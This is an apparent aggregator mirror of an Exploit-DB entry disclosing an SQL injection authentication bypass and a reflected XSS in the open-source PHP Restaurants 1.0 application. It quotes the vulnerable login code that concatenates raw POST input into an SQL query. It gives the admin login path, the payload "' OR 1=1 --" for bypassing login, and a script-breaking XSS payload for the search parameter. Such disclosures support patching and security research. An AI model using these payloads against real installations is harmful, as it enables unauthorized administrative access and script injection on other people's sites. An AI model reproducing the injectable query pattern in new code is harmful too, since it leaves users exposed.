11

[webapps] PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scri...

 1 year ago
source link: https://www.exploit-db.com/exploits/51398
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting

EDB-ID:

51398

EDB Verified:

Exploit:

  /  

Platform:

PHP

Date:

2023-05-02

Vulnerable App:

# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting (XSS)
# Google Dork: None
# Date: 4/26/2023
# Exploit Author: Or4nG.M4n
# Vendor Homepage: https://github.com/jcwebhole
# Software Link: https://github.com/jcwebhole/php_restaurants
# Version: 1.0


functions.php

function login(){
global $conn;
$email = $_POST['email'];
$pw = $_POST['password'];

$sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` =
'".md5($pw)."'"; <-- there is No filter to secure sql query
parm[email][password]
$result = $conn->query($sql);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day
header('location: index.php');
}
} else {
header('location: login.php?m=Wrong Password');
}

}

login bypass at admin page /rest1/admin/login.php

email & password : ' OR 1=1 --             <- add [space] end of the payload

cross site scripting main page /index.php

xhttp.open("GET", "functions.php?f=getRestaurants<?php
  if(isset($_GET['search'])) echo '&search='.$_GET['search']; <-- here we
can insert our xss payload
?>
  ", true);
xhttp.send();

</script> <-- when you insert your'e payload don't forget to add </script>
like

xss payload : </script><img onerror=alert(1) src=a>

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK